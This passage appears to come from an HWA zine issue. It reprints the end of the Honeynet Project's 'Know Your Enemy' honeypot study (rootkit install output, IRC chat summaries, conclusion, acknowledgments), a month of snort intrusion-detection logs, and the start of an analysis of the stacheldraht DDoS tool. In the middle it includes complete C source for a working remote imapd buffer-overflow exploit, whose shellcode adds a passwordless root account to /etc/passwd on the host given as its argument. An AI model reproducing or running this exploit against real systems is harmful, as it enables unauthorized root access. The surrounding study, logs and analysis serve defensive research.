      ./setup.sh: ./zap: not found 
      
      After cleaning the log files, the next step is to secure our system (how nice of them).  They know we are an easy kill and they do not want anyone else to ruin their compromised system. 
      
      ./secure.sh: rpc.ttdb=: not found 
      #: securing. 
      #: 1) changing modes on local files. 
      #: will add more local security later. 
      #: 2) remote crap like rpc.status , nlockmgr etc.. 
      ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] 
      ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] 
      #: 3) killed statd , rpcbind , nlockmgr 
      #: 4) removing them so they ever start again! 
      5) secured. 
         207 ?        0:00 inetd 
       11467 ?        0:00 inetd 
      cp: cannot access /dev/.. /sun/bot2 
      kill these processes@!#!@#! 
      cp: cannot access lpq 
      ./setup.sh: /dev/ttyt/idrun: cannot execute 
      
      Next, an IRC proxy is launched.  What is bizarre is that later on the script kills this process.  I have no idea why. 
      
      Irc Proxy v2.6.4 GNU project (C) 1998-99 
      Coded by James Seter :bugs-> (Pharos@refract.com) or IRC pharos on efnet 
      --Using conf file ./sys222.conf 
      --Configuration: 
          Daemon port......:9879 
          Maxusers.........:0 
          Default conn port:6667 
          Pid File.........:./pid.sys222 
          Vhost Default....:-SYSTEM DEFAULT- 
          Process Id.......:11599 
      Exit ./sys222{7} :Successfully went into the background. 
      
      More file modifications are done.  Not seen from the script output are the copying of Trojan binaries, including /bin/login, /bin/ls, /usr/sbin/netstat, and /bin/ps.  I highly recommend you review the source of the setup.sh script and the secure.sh script to see what actually
      happens.  One day you may have to review a system that has been rooted with a similar kit. 
      
      # kill -9 11467 
      # ps -u root |grep |grep inetd inetd 
         207 ?        0:00 inetd 
      # ..U/secure.sh/secure.sh 
      ./secure.sh: rpc.ttdb=: not found 
      #: securing. 
      #: 1) changing modes on local files. 
      #: will add more local security later. 
      #: 2) remote crap like rpc.status , nlockmgr etc.. 
      ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] 
      ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] 
      ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] 
      ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] 
      #: 3) killed statd , rpcbind , nlockmgr 
      #: 4) removing them so they ever start again! 
      5) secured. 
      # ppUs -u s -u U||U grep  grep ttUtdbtdb 
      Ups: option requires an argument -- u 
      usage: ps [ -aAdeflcj ] [ -o format ] [ -t termlist ] 
              [ -u userlist ] [ -U userlist ] [ -G grouplist ] 
              [ -p proclist ] [ -g pgrplist ] [ -s sidlist ] 
        'format' is one or more of: 
              user ruser group rgroup uid ruid gid rgid pid ppid pgid sid 
              pri opri pcpu pmem vsz rss osz nice class time etime stime 
              f s c tty addr wchan fname comm args 
      # ppUs -s -UAdj | grep ttdbAdj | grep ttdb 
      
      Last, our black-hat launches an IRC bot.  The purpose of this bot is to ensure they will maintain ops on the IRC channel of their choice.  This bot also recorded all their conversations on the IRC channel.  It is this bot that they installed on our compromised system that
      relayed their IRC chats on our network. 
      
      # ../me -f bot2 
      init: Using config file: bot2 
      EnergyMech 2.7.1, December 2nd, 1999 
      Starglider Class EnergyMech 
      Compiled on Jan 27 2000 07:06:04 
      Features: DYN, NEW, SEF 
      init: Unknown configuration item: "NOSEEN" (ignored) 
      init: Mechs added [ save2 ] 
      init: Warning: save2 has no userlist, running in setup mode 
      init: EnergyMech running... 
      # exit; 
      $ exit 
      
      Once the bot was in place, they left the system alone. It is this bot that captured all of their conversations (see Part II below). For more information on IRC and how the black-hat community uses IRC and bots, we highly recommend the paper Tracking Hackers on
      IRC by David Brumley. Over the course of the following week they returned several times, only to confirm that they still had access. One week later, on 11 June, they connected again and attempted to use the system for Denial of Service attacks. However, the
      honeynet is designed to block any attempt to use a honeypot as a base of an attack against outside systems. All attempts to use the honeypot for a Denial of Service attack were automatically blocked. 
      
      What we have witnessed here are commonly used tools and tactics of the black-hat community.  Our black-hat randomly scanned the Internet for a known vulnerability (in this case rpc.ttdbserv).  Once identified, they quickly compromised the system and installed a
      rootkit using commonly scripted tools.  Once they had control, they installed a bot, most likely to ensure they would maintain 'ops' on the IRC channels of their choice. What is uncommon are the two weeks of IRC chat sessions that their bot captured for us. In the
      next part of this paper, we discover the motivations and psychology of the black-hat community, in their own words. If you are concerned that your system(s) may have been compromised by similar means, review this checklist. It covers what to check for and links
      on how to react to a system compromise. 
      
      Part II: The IRC Chat Sessions 
      Below are the actual chat sessions of the black-hat community, specifically two individuals whom we will call D1ck and J4n3. Most of their chats will happen on the IRC channel we will call K1dd13. You will read the activities of these two main characters, and a
      variety of others.  The chat sessions are broken down by days, listed below.  We recommend you read them in sequence, so you can better understand what is going on.  IRC channels, IRC nicks, system names and IP addresses have been sanitized. All system IP
      addresses have been replaced with RFC 1918 address space, all system domain names have been replaced with 'example', and all credit card numbers have been placed by 'xxxx'. Any similarities the IRC channels or IRC nicks may have with the real world are purely
      coincidental. Be advised, some of the language used is abusive in nature, we have chosen not to sanitize this.  Also, sometimes several of the black-hats will speak foreign languages. Where possible, we have translated this into English. As you read these chat
      sessions, take into consideration their lack of skill and networking knowledge. Often you will see them attempting to figure out the most fundamental of Unix skills. And yet, they are still able to compromise or damage a large number of systems. This is not a threat to
      take lightly. 
        
      
           Day 1, June 04 
           Our chat sessions begin with the discussion of building an exploit archive and the sharing of exploits to be used against potential targets. 
      
           Day 2, June 05 
           Today D1ck and J4n3 share exploits and Denial of Service attacks. Notice how they brag about how many blists (broadcast amplifier networks) they have for the attacks. Looks like one of them is gunning for Linux boxes in .edu land. They also discussed using
           new rootkits for Linux and sparc. 
      
           Day 3, June 06 
           D1ck and J4n3 brag about the systems they have launched Denial of Service attacks against. Later on D1ck teaches J4n3 how to mount a drive. Then they discuss sniffit (how to use it) and last, D1ck desperately looks for an Irix exploit and rootkit. 
      
           Day 4, June 07 
           D1ck and J4n3 decided they want to take out India with Denial of Service attacks and bind exploits. Later on, they DoS other IRC members who irritate them. 
      
           Day 5, June 08 
           D1ck asks J4n3 to take out three systems for him. D1ck and his elite buddy Sp07 try to figure out how a sniffer works "umm doesnt it have to be the same network?". 
      
           Day 6, June 09 
           Our wonder team has been busy, looks like D1ck rooted over 40 systems. If they scan enough systems, they can and will gain root. 
      
           Day 7, June 10 
           Not an exciting day. D1ck teaches a new k1dd13 how to use the sadmind exploit. We are not sure if D1ck even knows how to use it himself. 
      
           Day 8, June 11 
           D1ck and J4n3 discuss systems they own and people they want to DoS. D1ck discovers Ping of Death and thinks he is very k3wl. 
      
           Day 9, June 12 
           Looks like D1ck strikes it big, he finds an ISP and gains access to their billing and over 5,000 user accounts. Now they have to figure out how to crack them. 
      
           Day 10, June 13 
           Sp07 joins the gang today. Not the friendliest individual for the Internet community. Seems to have taken a wee bit of a dislike to India also. 
      
           Day 11, June 14 
           They start cracking user passwords and access personal accounts. 
      
           Day 12, June 15 Also with Romanian Translated 
           D1ck and J4n3 try to find credit card numbers on a Credit Card channel so they can buy some domain names. 
      
           Day 13, June 16 Also with Romanian Translated 
           D1ck and J4n3 still hangout on the Credit Card channel. Members swap credit cards, shell accounts, and porn sites. At the end of the chat session, D1ck and J4n3 focus on their website. 
      
           Day 14, June 17 Also with Romanian Translated 
           D1ck and J4n3 cover how to gain accounts on a Linux box, talk more about Credit Cards and continue building a website.
      
      We have just reviewed 14 days in the life of the black-hat community. This is not meant to imply that all black-hats think and act like this. In fact, we have focused only on a few specific individuals. However, we hope this information gives you an idea of what many
      of the community are capable of. They may not be technically competent, or even understand the tools they are using. However by focusing on a large number of systems, they can achieve dramatic results. This is not a threat to take lightly. They are not concerned
      about what harm they may cause. They focus only on achieving their goals. 
      
      Conclusion 
      The purpose of this paper is to give you an understanding of the motives and psychology of the black-hat community. The paper started off with the system compromise of a Solaris 2.6 honeypot. It demonstrated a commonly used remote exploit of a vulnerable
      system. Once compromised, the system was quickly controlled with a rootkit, another commonly used tool among the black-hat community. However, what makes this paper unique is the look you get into the black-hat mentality. Here, you saw in their very own words
      how they think and act, particularly how they can indiscriminately attack and damage systems. They randomly probe large numbers of systems and attack the weakest systems they can find. By understanding their motives and methods, you can better protect your
      systems against this threat. 
      
      Acknowledgments 
      This paper is the result of the work and research of the Honeynet Project. The Honeynet Project is a small group of security professionals dedicated to learning the tools and tactics of the black-hat community. Part of the groups charter is to share these lessons
      learned with the security community. This paper is the first of future works by this group. Members of the group include: 
      
      Anne Marie Tenholder, Technology Research - Hiverworld, Inc. 
      Brad Powell, Sun Microsystems GESS Global Security Team 
      Chris Brenton, Dartmouth ISTS 
      David Dittrich, Senior Security Engineer - University of Washington 
      Ed Skoudis - Global Integrity Corp. 
      Frank Heidt - @stake 
      Fyodor, Author of Nmap Security Scanner and Insecure.Org. 
      George Kurtz, CEO - Foundstone, Inc. 
      K2 
      JD Glaser, NT Security Team - Foundstone, Inc. 
      John McDonald, TUV / Dataprotect GmbH 
      Lance Spitzner, Sun Microsystems GESS Global Security Team. 
      Martin Roesch, Director of Forensic Systems, Hiverworld, Inc 
      Max Vision, creator of arachNIDS and whitehats.com. 
      Robin Wakefield, Sun Microsystems GESS Global Security Team 
      Roger Safian 
      Saumil Shah, Principal Consultant (and Honenynet Project translator)- Foundstone, Inc. 
      Stuart McClure, - Foundstone, Inc. 
      Tom Stracener, Technology Research, Hiverworld, Inc. 
      Vacuum, Technotronic.com 
      
      Also, I would like to thank Alan Paller of SANS. Though not a member of the Honeynet Project, he has helped me make this research a reality. 
      
      @HWA      
            
306.0 [IND] Support docs and logs from the Know your enemy papers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      probed.txt - Know your enemy #1

      #
      # All the probes my network received in a sinlge month.
      # Starting 15 April, 2000
      #
      # You can lookup the IDS number signatures at
      # Max Vision's ArachNIDs database at 
      # http://www.whitehats.com
      #
      # Signatures captured using snort
      # http://www.snort.org
      #
      
      Apr 15 13:40:41 mozart snort[7002]: IDS212/dns-zone-transfer: 207.239.115.11:2307 -> 172.16.1.101:53
      Apr 16 02:45:37 mozart snort[7483]: IDS13/portmap-request-mountd: 200.190.13.181:1372 -> 172.16.1.107:111
      Apr 16 07:17:06 mozart snort[7483]: IDS128/web-cgi-phf: 200.190.8.220:55220 -> 172.16.1.107:80
      Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.101
      Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.105
      Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.107
      Apr 17 06:02:32 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.101:111
      Apr 17 06:02:32 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.107:111
      Apr 17 09:45:28 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.105:111
      Apr 19 08:00:19 mozart snort[3515]: IDS/DNS-version-query: 212.25.75.196:1723 -> 172.16.1.101:53
      Apr 20 01:26:00 mozart snort[3515]: IDS212/dns-zone-transfer: 24.234.45.60:4075 -> 172.16.1.107:53
      Apr 20 03:49:38 mozart snort[3515]: IDS/DNS-version-query: 216.123.23.5:4349 -> 172.16.1.101:53
      Apr 20 03:49:39 mozart snort[3515]: IDS/DNS-version-query: 216.123.23.5:4350 -> 172.16.1.107:53
      Apr 20 21:48:55 mozart snort[12353]: IDS246/large-icmp: 129.142.224.3 -> 172.16.1.107
      Apr 20 21:48:55 mozart snort[12353]: IDS246/large-icmp: 129.142.224.3 -> 172.16.1.107
      Apr 20 22:46:57 mozart snort[12632]: IDS/RPC-rpcinfo-query: 207.239.115.11:3619 -> 172.16.1.107:111
      Apr 20 22:48:13 mozart snort[12632]: IDS159/Ping Microsoft Windows: 216.228.4.204 -> 172.16.1.101
      Apr 20 22:46:57 mozart snort[12632]: IDS/RPC-rpcinfo-query: 207.239.115.11:3619 -> 172.16.1.107:111
      Apr 20 22:48:13 mozart snort[12632]: IDS159/Ping Microsoft Windows: 216.228.4.204 -> 172.16.1.101
      Apr 20 23:00:33 mozart snort[12657]: IDS171/Ping zeros: 216.228.4.133 -> 172.16.1.101
      Apr 21 11:01:27 mozart snort[12777]: IDS/DNS-version-query: 207.236.55.76:4039 -> 172.16.1.101:53
      Apr 21 11:01:28 mozart snort[12777]: IDS/DNS-version-query: 207.236.55.76:4044 -> 172.16.1.107:53
      Apr 22 08:36:29 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:1368 -> 172.16.1.101:53
      Apr 22 08:36:29 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:1328 -> 172.16.1.107:53
      Apr 22 10:00:23 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:4401 -> 172.16.1.101:53
      Apr 22 10:00:23 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:4369 -> 172.16.1.107:53
      Apr 22 11:31:58 mozart snort[743]: IDS/RPC-rpcinfo-query: 213.1.152.141:728 -> 172.16.1.101:111
      Apr 23 01:33:51 mozart snort[3919]: IDS128/web-cgi-phf: 12.68.183.51:4310 -> 172.16.1.107:80
      Apr 23 01:33:56 mozart snort[3919]: IDS218/web-cgi-test-cgi: 12.68.183.51:4312 -> 172.16.1.107:80
      Apr 23 01:34:01 mozart snort[3919]: IDS235/web-cgi-handler: 12.68.183.51:4314 -> 172.16.1.107:80
      Apr 23 01:34:20 mozart snort[3919]: IDS219/web-cgi-perl-exe: 12.68.183.51:4321 -> 172.16.1.107:80
      Apr 23 01:34:36 mozart snort[3919]: IDS224/web-cgi-nph-test-cgi: 12.68.183.51:4328 -> 172.16.1.107:80
      Apr 23 21:01:18 mozart snort[3919]: spp_portscan: PORTSCAN DETECTED from 210.178.9.125
      Apr 23 21:01:25 mozart snort[3919]: IDS/RPC-rpcinfo-query: 210.178.9.125:850 -> 172.16.1.101:111
      Apr 24 07:09:47 mozart snort[4663]: IDS212/dns-zone-transfer: 210.145.109.162:12540 -> 172.16.1.107:53
      Apr 24 09:23:01 mozart snort[4663]: IDS7/SourcePortTraffic-53-tcp: 202.42.233.186:53 -> 172.16.1.107:111
      Apr 24 09:23:01 mozart snort[4663]: IDS7/SourcePortTraffic-53-tcp: 202.42.233.186:53 -> 172.16.1.101:111
      Apr 24 09:23:05 mozart snort[4663]: IDS/RPC-rpcinfo-query: 202.42.233.186:637 -> 172.16.1.107:111
      Apr 24 09:23:10 mozart snort[4663]: IDS/RPC-rpcinfo-query: 202.42.233.186:638 -> 172.16.1.101:111
      Apr 24 14:36:55 mozart snort[4663]: IDS162/Ping Nmap 2.36BETA: 194.222.156.169 -> 172.16.1.105
      Apr 24 14:43:35 mozart snort[4663]: IDS162/Ping Nmap 2.36BETA: 194.222.156.169 -> 172.16.1.101
      Apr 24 14:46:46 mozart snort[4663]: spp_portscan: PORTSCAN DETECTED from 194.222.156.169
      Apr 24 14:46:46 mozart snort[4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
      Apr 24 17:59:51 mozart snort[4663]: IDS/DNS-version-query: 212.244.97.121:2891 -> 172.16.1.101:53
      Apr 24 18:01:05 mozart snort[4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
      Apr 24 19:04:01 mozart snort[4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
      Apr 25 02:08:07 mozart snort[5875]: IDS/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
      Apr 25 02:08:07 mozart snort[5875]: IDS/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
      Apr 25 02:38:17 mozart snort[5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
      Apr 25 08:02:41 mozart snort[5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
      Apr 25 08:02:41 mozart snort[5875]: IDS/DNS-version-query: 24.9.255.53:2991 -> 172.16.1.101:53
      Apr 25 19:37:32 mozart snort[5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
      Apr 26 05:45:12 mozart snort[6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
      Apr 26 06:43:05 mozart snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
      Apr 26 06:45:34 mozart snort[6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
      Apr 26 06:52:10 mozart snort[6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
      Apr 26 10:39:12 mozart snort[621]: spp_portscan: PORTSCAN DETECTED from 204.72.244.72
      Apr 26 10:39:12 mozart snort[621]: IDS198/SYN FIN Scan: 204.72.244.72:53 -> 172.16.1.101:53
      Apr 26 10:39:12 mozart snort[621]: IDS198/SYN FIN Scan: 204.72.244.72:53 -> 172.16.1.107:53
      Apr 26 17:11:07 mozart snort[621]: IDS128/web-cgi-phf: 207.239.115.11:3536 -> 172.16.1.105:80
      Apr 26 17:11:17 mozart snort[621]: IDS/DNS-version-query: 207.239.115.11:4727 -> 172.16.1.105:53
      Apr 29 21:05:06 mozart snort[5358]: spp_portscan: PORTSCAN DETECTED from 212.109.2.136
      Apr 29 21:05:06 mozart snort[5358]: IDS198/SYN FIN Scan: 212.109.2.136:1080 -> 172.16.1.105:1080
      Apr 30 02:06:37 mozart snort[5750]: spp_portscan: PORTSCAN DETECTED from 202.185.32.60
      Apr 30 02:06:37 mozart snort[5750]: IDS198/SYN FIN Scan: 202.185.32.60:0 -> 172.16.1.101:143
      May 1 04:03:40 mozart snort[6038]: spp_portscan: PORTSCAN DETECTED from 63.203.1.60
      May 1 04:03:47 mozart snort[6038]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 63.203.1.60:3083
      May 1 04:03:47 mozart snort[6038]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 63.203.1.60:3215
      May 1 06:36:53 mozart snort[6038]: IDS212/dns-zone-transfer: 63.203.1.60:1089 -> 172.16.1.101:53
      May 2 16:28:05 mozart snort[6443]: IDS/DNS-version-query: 207.229.143.40:1708 -> 172.16.1.101:53
      May 2 16:28:40 mozart snort[6443]: IDS/DNS-version-query: 207.229.143.40:1715 -> 172.16.1.101:53
      May 2 17:01:43 mozart snort[6443]: IDS/DNS-version-query: 24.114.97.247:3429 -> 172.16.1.101:53
      May 3 19:17:53 mozart snort[6862]: spp_portscan: PORTSCAN DETECTED from 205.242.148.1
      May 3 19:17:53 mozart snort[6862]: IDS198/SYN FIN Scan: 205.242.148.1:0 -> 172.16.1.101:109
      May 3 20:34:15 mozart snort[6862]: IDS/RPC-rpcinfo-query: 200.241.69.1:3697 -> 172.16.1.101:111
      May 3 23:33:55 mozart snort[6862]: spp_portscan: PORTSCAN DETECTED from 210.97.123.3
      May 3 23:33:55 mozart snort[6862]: IDS198/SYN FIN Scan: 210.97.123.3:0 -> 172.16.1.105:109
      May 4 04:59:35 mozart snort[7541]: spp_portscan: PORTSCAN DETECTED from 205.242.148.1
      May 4 04:59:35 mozart snort[7541]: IDS198/SYN FIN Scan: 205.242.148.1:0 -> 172.16.1.101:109
      May 4 15:32:17 mozart snort[7541]: IDS/DNS-version-query: 63.224.195.25:2293 -> 172.16.1.101:53
      May 4 19:14:34 mozart snort[7541]: IDS/DNS-version-query: 12.10.173.249:3434 -> 172.16.1.101:53
      May 5 06:06:52 mozart snort[8324]: IDS212/dns-zone-transfer: 211.38.95.197:2262 -> 172.16.1.101:53
      May 5 08:35:48 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:953 -> 172.16.1.101:111
      May 5 08:35:49 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:955 -> 172.16.1.101:111
      May 5 08:35:53 mozart snort[8324]: IDS20/portmap-request-sadmind: 139.130.213.4:901 -> 172.16.1.101:111
      May 5 08:35:54 mozart snort[8324]: IDS247/large-udp: 139.130.213.4:902 -> 172.16.1.101:32773
      May 5 08:36:53 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:954 -> 172.16.1.101:111
      May 5 08:36:53 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:956 -> 172.16.1.101:111
      May 5 16:04:21 mozart snort[8324]: IDS/RPC-rpcinfo-query: 195.117.3.58:970 -> 172.16.1.101:111
      May 5 17:04:28 mozart snort[8324]: spp_portscan: PORTSCAN DETECTED from 212.109.2.136
      May 5 17:04:28 mozart snort[8324]: IDS198/SYN FIN Scan: 212.109.2.136:109 -> 172.16.1.107:109
      May 5 17:04:28 mozart snort[8324]: IDS198/SYN FIN Scan: 212.109.2.136:109 -> 172.16.1.101:109
      May 5 17:42:24 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:2277 -> 172.16.1.101:53
      May 5 17:46:28 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1831 -> 172.16.1.101:53
      May 5 17:52:58 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1482 -> 172.16.1.101:53
      May 5 17:58:16 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:3310 -> 172.16.1.101:53
      May 5 20:29:05 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1723 -> 172.16.1.101:53
      May 5 20:32:01 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:3132 -> 172.16.1.101:53
      May 6 08:54:09 victim1.honeynet.org named[4991]: unapproved AXFR from [212.72.63.240].4429 for UICMBA.edu (not master/slave)
      May 6 19:44:52 victim1.honeynet.org named[4991]: unapproved AXFR from [211.39.95.226].4958 for UICMBA.edu (not master/slave)
      May 7 19:22:22 victim1.honeynet.org named[4991]: unapproved AXFR from [216.190.204.3].1866 for UICMBA.edu (not master/slave)
      May 8 12:42:05 victim1.honeynet.org named[4991]: unapproved AXFR from [203.75.204.245].4542 for UICMBA.edu (not master/slave)
      May 8 21:53:03 lisa snort[387]: IDS118/Traceroute ICMP: 24.21.107.249 -> 172.16.1.104
      May 8 21:58:40 lisa snort[387]: IDS162/Ping Nmap 2.36BETA: 24.21.107.249 -> 172.16.1.104
      May 8 21:58:41 lisa snort[387]: spp_portscan: PORTSCAN DETECTED from 24.21.107.249
      May 8 21:59:06 lisa snort[387]: IDS162/Ping Nmap 2.36BETA: 24.21.107.249 -> 172.16.1.104
      May 8 22:16:06 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.81:34536 -> 172.16.1.104:33457
      May 8 22:16:45 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.80:34546 -> 172.16.1.104:33446
      May 8 22:17:35 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.81:34561 -> 172.16.1.104:33457
      May 9 08:02:54 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 216.61.43.89
      May 9 08:21:02 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 204.2.13.22
      May 9 09:39:28 lisa snort[2370]: IDS212/dns-zone-transfer: 206.133.123.19:2421 -> 172.16.1.101:53
      May 9 11:03:20 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444
      May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335
      May 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444
      May 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335
      May 9 14:04:55 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 206.133.123.19
      May 9 14:04:57 lisa snort[2370]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 206.133.123.19:1720
      May 9 14:04:58 lisa snort[2370]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 206.133.123.19:1741
      May 9 14:05:08 lisa snort[2370]: IDS128/web-cgi-phf: 206.133.123.19:1815 -> 172.16.1.107:80
      May 9 14:05:09 lisa snort[2370]: IDS218/web-cgi-test-cgi: 206.133.123.19:1820 -> 172.16.1.107:80
      May 9 14:05:09 lisa snort[2370]: IDS235/web-cgi-handler: 206.133.123.19:1824 -> 172.16.1.107:80
      May 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444
      May 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335
      
      EoF
            
      imapd.c exploit - Know your enemy #1
      
      /*
      
        This is the remote exploit of the hole in the imap daemon, for
        Linux.  The instruction code is doing open(), write(), and close()
        system calls, and  it adds a line root::0:0.. at the beggining of
        /etc/passwd (change to /etc/shadow if needed).  The  code needs to
        be self modifying since imapd turns everything to lowercase before
        it pushes it on the stack.  The problem  is that it  rewrites the
        first line of passwd/shadow,  therefore loosing the root password.
      
        I'm sorry, but I don't have time to add in the seek syscall.
      
        - Akylonius (aky@galeb.etf.bg.ac.yu) [1997]
      
        Modifications made on 5.1.97 to accept command line hostname,  with
        'h_to_ip' function that resolves it to an ip.  -  p1 (p1@el8.org)
      
      */
      
      #include <string.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <stdio.h>
      #include <arpa/inet.h>
      #include <netdb.h>
      
      char *h_to_ip(char *hostname);
      
      char *h_to_ip(char *hostname) {
      
        struct hostent *h;
        struct sockaddr_in tmp;
        struct in_addr in;
      
        h = gethostbyname(hostname);
      
        if (h==NULL) { perror("Resolving the host. \n"); exit(-1); }
      
        memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length);
        memcpy(&in,&tmp.sin_addr.s_addr,4);
      
      return(inet_ntoa(in));
      }
      
      void banner(void) {
        system("clear");
        printf("\nIMAP Exploit for Linux.\n");
        printf("\n\tAuthor: Akylonius (aky@galeb.etf.bg.ac.yu)\n");
        printf(" Modifications: p1 (p1@el8.org)\n");
      }
      
      main(int argc, char **argv) {
      
        int fd;
        struct sockaddr_in sckdaddr;
        char *hostname;
        char buf[4092];
        int i=8;
        char realegg[] =
          "\xeb\x58\x5e"
          "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
          "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
          "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
          "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
          "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
          "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
          "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
          "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
          "iamaselfmodifyingmonsteryeahiam\xe8\x83\xff\xff\xff"
          "/etc/passwdxroot::0:0:r00t:/:/bin/bashx";
        char *point = realegg;
        buf[0]='*';
        buf[1]=' ';
        buf[2]='l';
        buf[3]='o';
        buf[4]='g';
        buf[5]='i';
        buf[6]='n';
        buf[7]=' ';
      
        banner();
      
        if (argc<2)  {
           printf("\nUsage: %s <hostname>\n\n", argv[0]);
           exit(-1);
        }
      
        hostname=argv[1];
      
        while(i<1034-sizeof(realegg) -1) /* -sizeof(realegg)+1) */
          buf[i++]=0x90;
      
        while(*point)
          buf[i++]=*(point++);
      
        buf[i++]=0x83; /* ebp */
        buf[i++]=0xf3;
        buf[i++]=0xff;
        buf[i++]=0xbf;
        buf[i++]=0x88; /* ret adr */
        buf[i++]=0xf8;
        buf[i++]=0xff;
        buf[i++]=0xbf;
      
        buf[i++]=' ';
        buf[i++]='b';
        buf[i++]='a';
        buf[i++]='h';
        buf[i++]='\n';
      
        buf[i++]=0x0;
      
      
        if ((fd=socket(AF_INET,SOCK_STREAM,0))<0) perror("Error opening the
      socket. \n");
      
        sckdaddr.sin_port=htons(143);
        sckdaddr.sin_family=AF_INET;
        sckdaddr.sin_addr.s_addr=inet_addr(h_to_ip(hostname));
      
        if (connect(fd,(struct sockaddr *) &sckdaddr, sizeof(sckdaddr)) < 0)
      perror("Error with connecting. \n");
      
        printf("hmm: \n");
        getchar();
        write(fd,buf,strlen(buf)+1);
        printf("hmm: \n");
        close(fd);
      }
      
      
      The stacheldraht DoS analysis - Know your enemy #1
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      
      ==========================================================================
      
            The "stacheldraht" distributed denial of service attack tool
      
      ==========================================================================
      
      David Dittrich <dittrich@cac.washington.edu>
      University of Washington
      Copyright 1999. All rights reserved.
      December 29, 1999
      
      
      Introduction
      ------------
      
      The following is an analysis of "stacheldraht", a distributed denial
      of service attack tool, based on source code from the "Tribe Flood
      Network" distributed denial of service attack tool. [Note that
      throughout this analysis, actual nicks, site names, and IP addresses
      have been sanitized.]
      
      Stacheldraht (German for "barbed wire") combines features of the
      "trinoo" distributed denial of service tool, with those of the
      original TFN, and adds encryption of communication between the
      attacker and stacheldraht masters and automated update of
      the agents.
      
      For more information on trinoo and TFN, see:
      
              http://staff.washington.edu/dittrich/misc/trinoo.analysis
              http://staff.washington.edu/dittrich/misc/tfn.analysis
      
      In late June and early July of 1999, one or more groups were
      installing and testing trinoo networks and waging medium to large
      scale denial of service attacks employing networks of over 2000
      compromised systems.  These attacks involved, and were aimed at,
      systems around the globe.
      
      In late August/early September of 1999, focus began to shift from
      trinoo to TFN, presumed to be the original code by Mixter.  Then in
      late September/early October, a program that looked a lot like the TFN
